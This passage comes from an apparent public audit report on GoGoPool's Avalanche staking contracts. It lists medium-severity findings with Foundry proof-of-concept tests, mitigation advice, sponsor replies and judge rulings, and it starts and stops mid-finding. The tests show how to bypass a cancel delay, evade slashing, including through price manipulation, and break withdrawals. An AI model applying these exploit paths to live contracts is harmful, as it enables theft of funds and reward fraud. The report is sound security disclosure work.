uint256 ratio = staking.getCollateralizationRatio(msg.sender);
if (ratio < dao.getMinCollateralizationRatio()) {
revert InsufficientGGPCollateralization();
// Get a Rialto multisig to assign for this minipool
MultisigManager multisigManager = MultisigManager(getContractAddress("MultisigManager"));
address multisig = multisigManager.requireNextActiveMultisig();
// Create or update a minipool record for nodeID
// If nodeID exists, only allow overwriting if node is finished or canceled
// (completed its validation period and all rewards paid and processing is complete)
int256 minipoolIndex = getIndexOf(nodeID);
if (minipoolIndex != -1) {
requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
// Also reset initialStartTime as we are starting a whole new validation
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0);
} else {
minipoolIndex = int256(getUint(keccak256("minipool.count")));
// The minipoolIndex is stored 1 greater than actual value. The 1 is subtracted in getIndexOf()
setUint(keccak256(abi.encodePacked("minipool.index", nodeID)), uint256(minipoolIndex + 1));
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".nodeID")), nodeID);
addUint(keccak256("minipool.count"), 1);
// Save the attrs individually in the k/v store
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".duration")), duration);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".delegationFee")), delegationFee);
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".owner")), msg.sender);
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".multisigAddr")), multisig);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpInitialAmt")), msg.value);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), msg.value);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), avaxAssignmentRequest);
emit MinipoolStatusChanged(nodeID, MinipoolStatus.Prelaunch);
Vault vault = Vault(getContractAddress("Vault"));
vault.depositAVAX{value: msg.value}();
and after 5 days, the user cancels the minipool
/// @notice Owner of a minipool can cancel the (prelaunch) minipool
/// @param nodeID 20-byte Avalanche node ID the Owner registered with
function cancelMinipool(address nodeID) external nonReentrant {
Staking staking = Staking(getContractAddress("Staking"));
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
int256 index = requireValidMinipool(nodeID);
// make sure they meet the wait period requirement
if (block.timestamp - staking.getRewardsStartTime(msg.sender) < dao.getMinipoolCancelMoratoriumSeconds()) {
revert CancellationTooEarly();
_cancelMinipoolAndReturnFunds(nodeID, index);
Then, the user recreates the minipool again by calling the same createMinipool function. Then, the user cancels the minipool immediately. The user should not be allowed to cancel the minpool immediately and he should wait for 5 more days.
Added a test unit to MinipoolManager.t.sol
function testMinipoolManager() public {
address nodeID1 = randAddress();
ggp.approve(address(staking), MAX_AMT);
staking.stakeGGP(100 ether);
MinipoolManager.Minipool memory mp = createMyMinipool(nodeID1, 1000 ether, 1000 ether, 2 weeks);
skip(5 days);
minipoolMgr.cancelMinipool(mp.nodeID); // Must skip 5 days to be executed
MinipoolManager.Minipool memory mp = createMyMinipool(nodeID1, 1000 ether, 1000 ether, 2 weeks);
minipoolMgr.cancelMinipool(mp.nodeID); // Do not need 5 days more to be executed which is wrong
Tools Used
Manual and added a test unit
Recommended Mitigation Steps
Change the createMinipool function. Always setRewardsStartTime everytime the minipool is recreated.
/// @notice Accept AVAX deposit from node operator to create a Minipool. Node Operator must be staking GGP. Open to public.
/// @param nodeID 20-byte Avalanche node ID
/// @param duration Requested validation period in seconds
/// @param delegationFee Percentage delegation fee in units of ether (2% is 0.2 ether)
/// @param avaxAssignmentRequest Amount of requested AVAX to be matched for this Minipool
function createMinipool(
address nodeID,
uint256 duration,
uint256 delegationFee,
uint256 avaxAssignmentRequest
) external payable whenNotPaused {
if (nodeID == address(0)) {
revert InvalidNodeID();
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
if (
// Current rule is matched funds must be 1:1 nodeOp:LiqStaker
msg.value != avaxAssignmentRequest ||
avaxAssignmentRequest > dao.getMinipoolMaxAVAXAssignment() ||
avaxAssignmentRequest < dao.getMinipoolMinAVAXAssignment()
) {
revert InvalidAVAXAssignmentRequest();
if (msg.value + avaxAssignmentRequest < dao.getMinipoolMinAVAXStakingAmt()) {
revert InsufficientAVAXForMinipoolCreation();
Staking staking = Staking(getContractAddress("Staking"));
staking.increaseAVAXStake(msg.sender, msg.value);
staking.increaseAVAXAssigned(msg.sender, avaxAssignmentRequest);
--- if (staking.getRewardsStartTime(msg.sender) == 0) {
staking.setRewardsStartTime(msg.sender, block.timestamp);
--- }
uint256 ratio = staking.getCollateralizationRatio(msg.sender);
if (ratio < dao.getMinCollateralizationRatio()) {
revert InsufficientGGPCollateralization();
// Get a Rialto multisig to assign for this minipool
MultisigManager multisigManager = MultisigManager(getContractAddress("MultisigManager"));
address multisig = multisigManager.requireNextActiveMultisig();
// Create or update a minipool record for nodeID
// If nodeID exists, only allow overwriting if node is finished or canceled
// (completed its validation period and all rewards paid and processing is complete)
int256 minipoolIndex = getIndexOf(nodeID);
if (minipoolIndex != -1) {
requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
// Also reset initialStartTime as we are starting a whole new validation
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0);
} else {
minipoolIndex = int256(getUint(keccak256("minipool.count")));
// The minipoolIndex is stored 1 greater than actual value. The 1 is subtracted in getIndexOf()
setUint(keccak256(abi.encodePacked("minipool.index", nodeID)), uint256(minipoolIndex + 1));
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".nodeID")), nodeID);
addUint(keccak256("minipool.count"), 1);
// Save the attrs individually in the k/v store
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".duration")), duration);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".delegationFee")), delegationFee);
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".owner")), msg.sender);
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".multisigAddr")), multisig);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpInitialAmt")), msg.value);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), msg.value);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), avaxAssignmentRequest);
emit MinipoolStatusChanged(nodeID, MinipoolStatus.Prelaunch);
Vault vault = Vault(getContractAddress("Vault"));
vault.depositAVAX{value: msg.value}();
emersoncloud (GoGoPool) confirmed
This solution would mess up other aspects of the protocol. In cancel minipool, we should really just check the minipoolStartTime against the cancelMoratoriumSeconds.
Alex the Entreprenerd (judge) commented:
The warden has shown a logic flaw in the Finite State Machine, as shown in the POC, cancelling a second miniPool can be done before
.Because the exploit doesn’t demonstrate a reliable way to extra value or funds from the protocol, I agree with Medium Severity.
emersoncloud (GoGoPool) mitigated:
Base cancelMinipool delay on minipool creation time not rewards start time: multisig-labs/gogopool#40
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-13] Slashing fails when node operator doesn’t have enough staked GGP
Submitted by immeas, also found by HollaDieWaldfee, datapunk, wagmi, yixxas, ck, cccz, nameruse, cozzetti, 0x73696d616f, and koxuan
When creating a minipool the node operator is required to put up a collateral in GGP
, the protocol token. The amount of GGP
collateral needed is currently calculated to be 10% of the AVAX
staked. This is calculated using the price of GGP - AVAX
If the node operator doesn’t have high enough availability and doesn’t get any rewards the protocol will slash their GGP
collateral to reward liquid stakers. This is also calculated using the price of GGP - AVAX
File: MinipoolManager.sol
547: function calculateGGPSlashAmt(uint256 avaxRewardAmt) public view returns (uint256) {
548: Oracle oracle = Oracle(getContractAddress("Oracle"));
549: (uint256 ggpPriceInAvax, ) = oracle.getGGPPriceInAVAX(); // price might change or be manipulated
550: return avaxRewardAmt.divWadDown(ggpPriceInAvax);
551: }
670: function slash(int256 index) private {
673: uint256 duration = getUint(keccak256(abi.encodePacked("minipool.item", index, ".duration")));
674: uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
675: uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt);
676: uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
681: Staking staking = Staking(getContractAddress("Staking"));
682: staking.slashGGP(owner, slashGGPAmt);
683: }
This is then subtracted from their staked amount:
File: Staking.sol
94: function decreaseGGPStake(address stakerAddr, uint256 amount) internal {
95: int256 stakerIndex = requireValidStaker(stakerAddr);
96: subUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".ggpStaked")), amount); // can fail due to underflow
97: }
379: function slashGGP(address stakerAddr, uint256 ggpAmt) public onlySpecificRegisteredContract("MinipoolManager", msg.sender) {
380: Vault vault = Vault(getContractAddress("Vault"));
381: decreaseGGPStake(stakerAddr, ggpAmt);
382: vault.transferToken("ProtocolDAO", ggp, ggpAmt);
383: }
The issue is that the current staked amount is never checked so the subUint
can fail due to underflow if the price has changed since the minipool was created/recreated.
If a node operator doesn’t have enough collateral, possibly caused by price changes in GGP
during slashing they evade slashing all together.
It’s even possible for the node operator to foresee this and manipulate the price of GGP
just prior to the period ending if they know that they are going to be slashed.
Proof of Concept
PoC test in MinipoolManager.t.sol
function testRecordStakingEndWithSlashNotEnoughStake() public {
uint256 duration = 365 days;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 100 ether; // just enough
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
skip(2 weeks);
vm.prank(address(rialto)); // price changes just a bit
oracle.setGGPPriceInAVAX(0.999 ether, block.timestamp);
vm.expectRevert(); // staking cannot end because of underflow
minipoolMgr.recordStakingEnd{value: validationAmt}(mp1.nodeID, block.timestamp, 0 ether);
The only thing the protocol can do now is to call recordStakingError
for the minipool, since no other state changes are allowed. This will return the staked funds but it will not slash the GGP
amount for the node operator. Hence the node operator has evaded the slashing.
Tools Used
vs code, forge
Recommended Mitigation Steps
If the amount to be slashed is greater than what the node operator has staked, slash all their stake.
Alex the Entreprenerd (judge) commented:
The Warden has shown a risk to the protocol, in cases in which the price of GPP drops too low, slashing could not be performed.
In contrast to other reports, this is a finding that shows an issue with the system and it’s consequences, more so than an economic attack.
For this reason I believe Medium to be the most appropriate severity.
emersoncloud (GoGoPool) mitigated:
If staked GGP doesn’t cover slash amount, slash it all: multisig-labs/gogopool#41
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-14] Any duration can be passed by node operator
Submitted by immeas, also found by unforgiven, V_B, 0xbepresent, 0xdeadbeef0x, and 0x73696d616f
When a node operator creates a minipool they pass which duration they want to stake for. There is no validation for this field so they can pass any field:
File: MinipoolManager.sol
196: function createMinipool(
197: address nodeID,
198: uint256 duration,
199: uint256 delegationFee,
200: uint256 avaxAssignmentRequest
201: ) external payable whenNotPaused {
... // no validation for duration
256: setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
257: setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".duration")), duration); // duration stored
258: setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".delegationFee")), delegationFee);
Later when staking is done. if the node op was slashed, duration
is used to calculate the slashing amount:
File: MinipoolManager.sol
557: function getExpectedAVAXRewardsAmt(uint256 duration, uint256 avaxAmt) public view returns (uint256) {
558: ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
559: uint256 rate = dao.getExpectedAVAXRewardsRate();
560: return (avaxAmt.mulWadDown(rate) * duration) / 365 days;
561: }
670: function slash(int256 index) private {
673: uint256 duration = getUint(keccak256(abi.encodePacked("minipool.item", index, ".duration")));
674: uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
675: uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt);
676: uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
The node operator cannot pass in 0
because that reverts due to zero transfer check in Vault. However the node operator can pass in 1
to guarantee the lowest slash amount possible.
Rialto might fail this, but there is little information about how Rialto uses the duration
passed. According to this comment they might default to 14 days
in which this finding is valid:
JohnnyGault — 12/30/2022 3:22 PM
To clarify duration for everyone — a nodeOp can choose a duration they want, from 14 days to 365 days. But behind the scenes, Rialto will only create a validator for 14 days. …
The node operator can send in a very low duration
to get minimize slashing amounts. It depends on the implementation in Rialto, which we cannot see. Hence submitting this.
Proof of Concept
PoC test in MinipoolManager.t.sol
function testRecordStakingEndWithSlashZeroDuration() public {
uint256 duration = 1; // zero duration causes vault to fail on 0 amount
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 200 ether;
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
skip(2 weeks);
minipoolMgr.recordStakingEnd{value: validationAmt}(mp1.nodeID, block.timestamp, 0 ether);
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndex);
assertEq(mp1Updated.status, uint256(MinipoolStatus.Withdrawable));
assertEq(mp1Updated.avaxTotalRewardAmt, 0);
assertTrue(mp1Updated.endTime != 0);
assertEq(mp1Updated.avaxNodeOpRewardAmt, 0);
assertEq(mp1Updated.avaxLiquidStakerRewardAmt, 0);
assertEq(minipoolMgr.getTotalAVAXLiquidStakerAmt(), 0);
assertEq(staking.getAVAXAssigned(mp1Updated.owner), 0);
assertEq(staking.getMinipoolCount(mp1Updated.owner), 0);
// very small slash amount
assertLt(mp1Updated.ggpSlashAmt, 0.000_01 ether);
assertGt(staking.getGGPStake(mp1Updated.owner), ggpStakeAmt - 0.000_01 ether);
Tools Used
vs code, forge
Recommended Mitigation Steps
Regardless if Rialto will fail this or not, I recommend that the duration
passed is validated to be within 14 days
and 365 days
Alex the Entreprenerd (judge) commented:
The Warden has shown how, due to a lack of check, a duration below 14 days can be set, this could also be used to reduce the slash penalty.
I believe that in reality, such a pool will be closed via
, however, this enables a grief that could impact the Protocol in a non-trivial manner.For this reason, I believe the most appropriate severity to be Medium.
emersoncloud (GoGoPool) mitigated:
Added bounds for duration passed by Node Operator: multisig-labs/gogopool#38
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-15] Wrong reward distribution between early and late depositors because of the late syncRewards()
call in the cycle, syncReward()
logic should be executed in each withdraw or deposits (without reverting)
Submitted by unforgiven, also found by Bnke0x0, joestakey, 0xNazgul, Breeje, IllIllI, IllIllI, __141345__, kiki_dev, koxuan, fs0c, ck, btk, csanuragjain, rvierdiiev, HollaDieWaldfee, 0x73696d616f, and Rolezn
Function syncRewards()
distributes rewards to TokenggAVAX holders, it linearly distribute cycle’s rewards from block.timestamp
to the cycle end time which is next multiple of the rewardsCycleLength
(the end time of the cycle is defined and the real duration of the cycle changes). when a cycle ends syncRewards()
should be called so the next cycle starts but if syncRewards()
doesn’t get called fast, then users depositing or withdrawing funds before call to syncRewards()
would lose their rewards and those rewards would go to users who deposited funds after syncRewards()
call. contract should try to start the next cycle whenever deposit or withdraw happens to make sure rewards are distributed fairly between users.
Proof of Concept
This is syncRewards()
function syncRewards() public {
uint32 timestamp = block.timestamp.safeCastTo32();
if (timestamp < rewardsCycleEnd) {
revert SyncError();
uint192 lastRewardsAmt_ = lastRewardsAmt;
uint256 totalReleasedAssets_ = totalReleasedAssets;
uint256 stakingTotalAssets_ = stakingTotalAssets;
uint256 nextRewardsAmt = (asset.balanceOf(address(this)) + stakingTotalAssets_) - totalReleasedAssets_ - lastRewardsAmt_;
// Ensure nextRewardsCycleEnd will be evenly divisible by `rewardsCycleLength`.
uint32 nextRewardsCycleEnd = ((timestamp + rewardsCycleLength) / rewardsCycleLength) * rewardsCycleLength;
lastRewardsAmt = nextRewardsAmt.safeCastTo192();
lastSync = timestamp;
rewardsCycleEnd = nextRewardsCycleEnd;
totalReleasedAssets = totalReleasedAssets_ + lastRewardsAmt_;
emit NewRewardsCycle(nextRewardsCycleEnd, nextRewardsAmt);
As you can see whenever this function is called it starts the new cycle and sets the end of the cycle to the next multiple of the rewardsCycleLength
and it release the rewards linearly between current timestamp and cycle end time. So if syncRewards()
get called near to multiple of the rewardsCycleLength
then rewards would be distributed with higher speed in less time. The problem is that users depositing funds before call syncRewards()
won’t receive new cycles rewards and early depositing won’t get considered in reward distribution if deposits happen before syncRewards()
call and if a user withdraws his funds before the syncRewards()
call then he receives no rewards.
Imagine this scenario:
is 10 days and the rewards for the next cycle is100
AVAX.- the last cycle has been ended and user1 has
AVAX deposited and has 50% of the pool shares. syncRewards()
don’t get called for 8 days.- users1 withdraws his funds receive
AVAX even so he deposits for 8 days in the current cycle. - users2 deposit
AVAX and get 10% of pool shares and the user2 would callsyncRewards()
and contract would start distributing100
avax as reward. - after 2 days cycle would finish and user2 would receive
100 * 10% = 10
AVAX as rewards for his1000
AVAX deposit for 2 days but user1 had10000
AVAX for 8 days and would receive 0 rewards.
So rewards won’t distribute fairly between depositors across the time and any user interacting with contract before the syncRewards()
call can lose his rewards. Contract won’t consider deposit amounts and duration before syncRewards()
call and it won’t make sure that syncRewards()
logic would be executed as early as possible with deposit or withdraw calls when a cycle ends.
Tools Used
Recommended Mitigation Steps
One way to solve this is to call syncRewards()
logic in each deposit or withdraw and make sure that cycles start as early as possible (the revert “SyncError()” in the syncRewards()
should be removed for this).
emersoncloud (GoGoPool) disagreed with severity and commented:
I think that medium severity is more appropriate. User funds aren’t drained or lost, but liquid staking rewards may be unfairly calculated.
Good find. I think there is something we could do to either incentivize the
call or call it on deposit and withdraw.But I disagree with the concept that the user who staked for 8 days is entitled to rewards for staking. Rewards depend on properly running minipools. Reward amounts can fluctuate depending on the utilization of liquid staking funds by minipools.
emersoncloud (GoGoPool) commented:
After some more discussion, this is working as designed. And Rialto will call
at the start of each reward cycle, so the possible loss to the user who withdraws beforesyncRewards
was supposed to be called is mitigated.
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
The Warden has shown a potential risk for end-users that withdraw before
is called.Because the finding pertains to a loss of yield, I believe the finding to be of Medium Severity.
While Rialto may call this as a perfect actor, we cannot guarantee that a end user could forfeit some amount of yield, due to external conditions.
I believe this finding to potentially be a nofix, as long as all participants are aware of the mechanic.
Per discussions had on #99, I don’t believe that any specific MEV attack has been identified, however this finding does highlight a potential risk that a mistimed withdrawal could cause.
emersoncloud (GoGoPool) commented:
Not fixing but will add a note in our docs.
[M-16] maxWithdraw()
and maxRedeem()
doesn’t return correct value which can make other contracts fail while working with protocol
Submitted by unforgiven
Functions maxWithdraw()
and maxRedeem()
returns max amount of assets or shares owner would be able to withdraw taking into account liquidity in the TokenggAVAX contract, but logics don’t consider that when user withdraws the withdrawal amounts subtracted from totalReleasedAssets
(in beforeWithdraw()
function) so the maximum amounts that can user withdraws should always be lower than totalReleasedAssets
(which shows all the deposits and withdraws) but because functions maxWithdraw()
and maxRedeem()
uses totalAssets()
to calculate available AVAX which includes deposits and current cycle rewards so those functions would return wrong value (whenever the return value is bigger than totalReleaseAssets
then it would be wrong).
Proof of Concept
This is beforeWithdraw()
function beforeWithdraw(
uint256 amount,
uint256 /* shares */
) internal override {
totalReleasedAssets -= amount;
This is beforeWithdraw()
code which is called whenever users withdraws their funds and as you can see the amount of withdrawal assets subtracted from totalReleaseAssets
so withdrawal amounts can never be bigger than totalReleaseAssets
. This is maxWithdraw()
function maxWithdraw(address _owner) public view override returns (uint256) {
if (getBool(keccak256(abi.encodePacked("contract.paused", "TokenggAVAX")))) {
return 0;
uint256 assets = convertToAssets(balanceOf[_owner]);
uint256 avail = totalAssets() - stakingTotalAssets;
return assets > avail ? avail : assets;
As you can see to calculate available AVAX in the contract address code uses totalAssets() - stakingTotalAssets
and totalAssets()
shows deposits + current cycle rewards so totalAssets()
is bigger than totalReleaseAssets
and the value of the totalAssets() - stakingTotalAssets
can be bigger than totalReleaseAssets
and if code returns avail
as answer then the return value would be wrong.
Imagine this scenario:
AVAX.- current cycle rewards is
AVAX andblock.timestamp
is currently in the middle of the cycle so current rewards is2000
AVAX. totalAssets()
istotalReleaseAssets + current rewards = 10000 + 2000 = 12000
.- contract balance is
10000 + 4000 - 1000 = 13000
AVAX. - user1 has 90% contract shares and calls
and code would calculate user assets as10800
AVAX and available AVAX in contract astotalAssets() - stakingTotalAssets = 12000 - 1000 = 11000
and code would return10800
as answer. - now if user1 withdraws
AVAX code would revert in the functionbeforeWithdraw()
because code would try to executetotalReleaseAssets = totalReleaseAssets - amount = 10000 - 10800
and it would revert because of the underflow. so in reality user1 couldn’t withdraw10800
AVAX which was the return value of themaxWithdraw()
for user1.
The root cause of the bug is that the withdrawal amount is subtracted from totalReleaseAssets
and so max withdrawal can never be totalReleaseAssets
and function maxWithdraw()
should never return value bigger than totalReleaseAssets
. (the bug in function maxRedeem()
is similar)
This bug would cause other contract or front end calls to fail, for example if the logic is something like this:
amount = maxWithdraw(user);
According the function definitions this code should work bug because of the the issue there are situations that this would revert and other contracts and UI can’t work properly with the protocol.
Tools Used
Recommended Mitigation Steps
Consider totalReleaseAssets
in max withdrawal amount too.
emersoncloud (GoGoPool) confirmed
Alex the Entreprenerd (judge) commented:
The Warden has shown an inconsistency between the view functions and the actual behaviour of
This breaks ERC4626, as well as offering subpar experience for end-users.For this reason I agree with Medium Severity.
emersoncloud (GoGoPool) commented:
I’ve added some tests to explore this more, but it’s a known issue with how we’ve implemented the streaming of rewards in our 4626. Some more context here https://github.com/fei-protocol/ERC4626/issues/24.
It’s most prevalent with low liquidity in ggAVAX.
We’re not going to fix in the first iteration of protocol.
[M-17] NodeOp can get rewards even if there was an error in registering the node as a validator
Submitted by 0xbepresent, also found by datapunk, hansfriese, 0xbepresent, cccz, and cozzetti
The documentation says that the NodeOps could be elegible for GGP rewards if they have a valid minipool. The problem is that if the MiniPool has an error while registering the node as a validator, the NodeOp can get rewards even if the minipool had an error.
When the Rialto calls recordStakingError()
function the AssignedHighWater
is not reseted. So the malicious NodeOp (staker) can create pools which will have an error in the registration and get rewards from the protocol.
Proof of Concept
I created a test in ClaimNodeOp.t.sol
- NodeOp1 creates minipool
- Rialto calls claimAndInitiateStaking, recordStakingStart and recordStakingError()
- NodeOp1 withdraw his funds from minipool
- NodeOp1 can get rewards even if there was an error with the node registration as validator.
function testRecordStakingErrorCanGetRewards() public {
// NodeOp can get rewards even if there was an error in registering the node as a validator
// 1. NodeOp1 creates minipool
// 2. Rialot/multisig claimAndInitiateStaking, recordStakingStart and recordStakingError
// 3. NodeOp1 withdraw his funds from minipool
// 4. NodeOp1 can get rewards even if there was an error with the node registration as validator.
address nodeOp1 = getActorWithTokens("nodeOp1", MAX_AMT, MAX_AMT);
uint256 duration = 2 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
// 1. NodeOp1 creates minipool
ggp.approve(address(staking), MAX_AMT);
staking.stakeGGP(200 ether);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
// 2. Rialto/multisig claimAndInitiateStaking, recordStakingStart and recordStakingError
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
bytes32 errorCode = "INVALID_NODEID";
int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
skip(2 weeks);
minipoolMgr.recordStakingError{value: depositAmt + avaxAssignmentRequest}(mp1.nodeID, errorCode);
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndex);
assertEq(mp1Updated.avaxTotalRewardAmt, 0);
assertEq(mp1Updated.errorCode, errorCode);
assertEq(mp1Updated.avaxNodeOpRewardAmt, 0);
assertEq(mp1Updated.avaxLiquidStakerRewardAmt, 0);
assertEq(minipoolMgr.getTotalAVAXLiquidStakerAmt(), 0);
assertEq(staking.getAVAXAssigned(mp1Updated.owner), 0);
// The highwater doesnt get reset in this case
assertEq(staking.getAVAXAssignedHighWater(mp1Updated.owner), depositAmt);
// 3. NodeOp1 withdraw his funds from the minipool
uint256 priorBalance_nodeOp = nodeOp1.balance;
assertEq((nodeOp1.balance - priorBalance_nodeOp), depositAmt);
// 4. NodeOp1 can get rewards even if there was an error with the node registration as validator.
assertTrue(nopClaim.isEligible(nodeOp1)); //<- The NodeOp1 is eligible for rewards
nopClaim.calculateAndDistributeRewards(nodeOp1, 200 ether);
assertGt(staking.getGGPRewards(nodeOp1), 0);
nopClaim.claimAndRestake(staking.getGGPRewards(nodeOp1)); //<- Claim nodeOp1 rewards
Tools used
Recommended Mitigation Steps
The MinipoolManager.sol::recordStakingError()
function should reset the Assigned high water staking.resetAVAXAssignedHighWater(stakerAddr);
so the user can not claim rewards for a minipool with errors.
emersoncloud (GoGoPool) commented:
Good find. This is unique in terms of calling out
but I’m going to link other issues dealing withrecordStakingError
emersoncloud (GoGoPool) disagreed with severity and commented:
Since this is not a leak of funds in the protocol but GGP rewards instead, I think a medium designation is more appropriate
So the warden is incorrect about the order of events that should happen, the correct order is the following:
- NodeOp1 creates minipool
- Rialto calls
- Rialto calls
if the staking with avalanche was successful. If it was not, Rialto will callrecordStakingError()
. So Rialto will never be calling both of these functions, it is one or the other.
is only changed inrecordStakingStart()
, so not sure we would want to reset it inrecordStakingError()
.Questioning the validity of the issue.
emersoncloud (GoGoPool) commented:
The key issue is that a minipool won’t ever go from
state. It’s currently allowed in our state machine but it’s not a situation that can happen on the Avalanche network and something we’ll fix. In that way it depends on Rialto making a mistake to transition the minipool from staking to error.I think pointing out the issue in our state machine is valid and QA level.
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
The Warden has highlighted an issue with the FSM of the system.
While Rialto is assumed as a perfect actor, the code allows calling
and thenrecordStakingError
.This state transition is legal, however will cause issues, such as setting
to a higher value than intended, which could allow the staker to be entitled to rewards.Because the State Transition will not happen in reality (per the Scope Requirements), am downgrading the finding to Medium Severity and believe the State Transition Check should be added to offer operators and end users a higher degree of on-chain guarantees.
emersoncloud (GoGoPool) mitigated:
Remove the state transition from Staking to Error: multisig-labs/gogopool#28
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-18] Users may not be able to redeem their shares due to underflow
Submitted by 0xbepresent, also found by datapunk, Franfran, Breeje, IllIllI, Matin, SmartSek, nadin, unforgiven, fs0c, btk, ck, 0xdeadbeef0x, 0xdeadbeef0x, rvierdiiev, and Rolezn
The totalReleasedAssets
variable is updated on the syncRewards() function if someone calls the function before rewardsCycleEnd
the redeemAVAX() will be reverted because the totalReleasedAssets
may not include all the rewards.
The ggAvax holder can not redeem his funds until the rewardsCycleEnd
Proof of Concept
I did the next test:
- Create minipool (2000 avax)
- Deposit rewards to the minipool (200 AVAX rewards)
- Sync the rewards before the cycle ends
- Redeem function will revert
- Redeem will be available after the cycle end
function testRedeemUnderOverFlow() public {
// Redeem function reverts arithmetic error
// 1.- Create minipool
// 2.- Deposit rewards to the minipool
// 3.- Sync the Rewards before the cycle end
// 4.- Redeem function will revert
// 5.- Redeem will be available after the cycle end.
// Deposit liquid staker funds
uint256 depositAmount = 1200 ether;
uint256 nodeAmt = 2000 ether;
uint128 ggpStakeAmt = 200 ether;
vm.deal(bob, depositAmount);
ggAVAX.depositAVAX{value: depositAmount}();//Avax deposit 1200
// 1.- Create minipool
address nodeOp = getActorWithTokens("nodeOp", uint128(depositAmount), ggpStakeAmt);
// Nodeop stake GGP and create minipoool
ggp.approve(address(staking), ggpStakeAmt);
MinipoolManager.Minipool memory mp = createMinipool(nodeAmt / 2, nodeAmt / 2, duration);
// Rialto init recordStakingStart
minipoolMgr.recordStakingStart(mp.nodeID, randHash(), block.timestamp);
// 2.- Deposit rewards to the minipool
uint256 rewardsAmt = nodeAmt.mulDivDown(0.1 ether, 1 ether);
console.log("Rewards amount:", rewardsAmt / 1 ether);
vm.deal(address(rialto), address(rialto).balance + rewardsAmt);
minipoolMgr.recordStakingEnd{value: nodeAmt + rewardsAmt}(mp.nodeID, block.timestamp, rewardsAmt);
// 3.- Sync the Rewards before the cycle end
uint256 maxRedeemSharesBob = ggAVAX.maxRedeem(bob);
console.log("TotalReleasedAssets after syncRewards:", ggAVAX.totalReleasedAssets() / 1 ether);
